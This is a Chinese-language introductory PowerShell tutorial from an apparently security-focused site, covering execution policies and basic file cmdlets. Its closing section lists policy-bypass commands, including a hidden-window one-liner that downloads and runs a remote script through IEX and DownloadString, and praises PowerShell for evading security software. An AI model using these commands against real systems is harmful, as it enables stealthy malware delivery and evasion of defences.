<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    PowerShell入門學習

    VSole2022-03-13 06:42:08

    PowerShell簡介

    PowerShell是一種命令行外殼程序和腳本環境,它置于Windows7/Windows Server2008 R2及以上更高的版本中。它可以執行Linux系統下的一些命令,這是非常強大的一點。它的腳本后綴為(.ps1),可在磁盤中執行,也可無需寫入磁盤直接在內存中運行。

    PowerShell的優點

    1、Windows7以上的操作系統默認安裝。

    2、PowerShell腳本可以運行在內存中,不需要寫入磁盤。

    3、可以從另一個系統中下載PowerShell腳本并執行。

    4、目前很多工具都是基于PowerShell開發的。

    5、很多安全軟件并不能檢測到PowerShell的活動。

    6、cmd.exe通常會被阻止運行,但是PowerShell不會。

    7、可以用來管理活動目錄。


    使用命令查看PowerShell版本:

    Get-Host或者$PSVersionTable.PSVERSION

    經測試,PowerShell不區分大小寫:

    PowerShell的基本概念

    PS1文件

    PowerShell腳本就是一個簡單的腳本文件,包含了一系列的PowerShell命令,每個命令顯示為獨立的一行。PS腳本文件的后綴為(.ps1)。

    執行策略

    為了防止惡意腳本的執行,PowerShell有一個執行策略,默認情況下,執行策略被設為受限。

    使用命令確定當前的執行策略:

    Get-ExecutionPolicy

    因為之前我在本機上沒有執行過PowerShell的任何腳本,所以PS的執行策略為默認設置即受限(Restricted)。

    PowerShell具有四種執行策略分別為:

    1、Restricted:腳本不能運行(默認設置)。

    2、RemoteSigned:本地創建的腳本可運行,網上下載的帶數字證書簽名的腳本可運行。

    3、AllSigned:僅當腳本由受信任的發布者簽名時才能運行。

    4、Unrestricted:允許所有的腳本運行。


    使用命令設置PowerShell的執行策略:

    Set-ExecutionPolicy

    將執行策略設置為允許所有腳本運行:

    Set-ExecutionPolicy Unrestricted

    第一次執行爆紅了,提示我們需要以管理員身份運行PowerShell,所以修改執行策略的時候需要管理員身份。

    以管理員的身份進行修改就ok了。

    再次查看執行策略,策略被修改:


    運行腳本

    運行PS腳本,必須鍵入完整的路徑和文件名,例如C:\Scripts\a.ps1

    若此PS腳本恰好在剛好位于當前處在的目錄中,可以直接在腳本名前加.\以運行腳本,例如.\a.ps1

    管道

    管道的作用是將一個命令的輸出作為另一個命令的輸入,以符號|連接。

    get-process p*的意思是獲取以”p”字符開頭的程序

    get-process p* | stop-process則是關掉以”p”字符開頭的程序。

    PowerShell常用命令

    基本知識

    PS的命令都采用”動詞+名詞”的形式。

    關于文件操作的命令:

    1、新建目錄:md test1

    ——MD函數,它內部調用的是New-Item命令,指定參數–type的值為Directory

    new-item test2.txt -type directory


    2、新建文件

    new-item test.txt -type file


    3、刪除目錄

    remove-item test1


    4、顯示文本的內容

    get-content test.txt


    5、設置文本的內容

    set-content test.txt -value "again Hello World!"

    在這里看出,如果本來文件中有內容,但使用此命令,原來的內容就會消失,等于重置。


    6、追加內容

    add-content test.txt -value "今天是情人節!"

    可以看到追加的內容,追加在下一行。


    7、清除內容

    clear-content test.txt

    可以看到內容被清除。

    常用命令

    1、繞過本地權限執行

    PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

    2、本地隱藏繞過權限執行腳本

    PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -Nonlnteractive -NoProfile -File xxx.ps1

    3、用IEX下載遠程PS1腳本繞過權限執行

    PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden-NoProfile-NonI IEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]


    ExecutionPolicy Bypass繞過執行安全策略

    WindowStyle Hidden隱藏窗口

    NoProfilePowerShell控制臺不加載當前用戶的配置文件

    NolLogo啟動不顯示版權標志的PowerShell

    Nonlnteractive非交互模式,PowerShell不為用戶提供交互的提示

    Noexit執行后不退出shell(常用于鍵盤記錄)

    powershell運行命令
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    PowerSploit這是眾多PowerShell攻擊工具中被廣泛使用的PowerShell后期漏洞利用框架,常用于信息探測、特權提升、憑證竊取、持久化等操作。Empire基于PowerShell的遠程控制木馬,可以從憑證數據庫中導出和跟蹤憑據信息,常用于提供前期漏洞利用的集成模塊、信息探測、憑據竊取、持久化控制。
    0X01起源在攻防演練中通過運行惡意代碼連接C2是最常用的手段,但是由于對抗程度的提升。以360、天擎為代表的殺毒軟件針對信任鏈的檢測,已經變得愈來愈成熟。這里我們可以理解為,攻擊者通過利用"白加黑"這種攻擊方法。當攻擊者通過社工釣魚的手段,使得目標下載惡意的文件到目標自己的計算機上,并點擊運行白文件時,該文件會在運行時執行惡意DLL。
    系統安全第40篇文章介紹PowerShell基礎知識,希望您喜歡
    前言實際滲透測試中,有些漏洞因為沒有回顯導致無法準確判斷漏洞是否存在,可能導致滲透測試人員浪費大量精力在一個并不存在的漏洞上,因此為了驗證一些無回顯漏洞,
    這篇文章記錄了CVE-2021-34527的復現過程,并對漏洞成因進行了簡單的分析。
    7月20日,微軟緊急發布了Windows權限提升漏洞的風險通告,漏洞CVE編號:CVE-2021-36934。目前微軟暫未發布該漏洞修復補丁,建議受影響用戶通過臨時緩解方法進行防護,并做好資產自查以及預防工作,以免遭受黑客攻擊。
    奇安信CERT致力于第一時間為企業級用戶提供安全風險通告和有效解決方案。風險通告近日,奇安信CERT監測到微
    內網滲透TIPS總結
    2023-01-28 11:00:41
    內網基礎知識1、工作組:工作組是 局域網 中的一個概念,他是長久的資源管理模式。默認情況下使用工作組方式進行資源管理,將不同的 computer 按照不同的要求分類到不同的組。而實際上,因為域名的計算機是使用DNS 來定位域控制器、服務器及其他計算機、網絡服務的,所以域的名字就是DNS 域的名字。在內網滲透測試中,大都是通過尋找 DNS 服務器來確定域控制器的位置的。
    攻擊者越來越多地將 Internet 信息服務 (IIS) 擴展用作服務器的隱蔽后門,這些后門隱藏在目標環境的深處,并為攻擊者提供了持久的持久性機制。雖然之前已經發表了關于特定事件和變體的研究,但對于攻擊者如何利用 IIS 平臺作為后門通常知之甚少。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类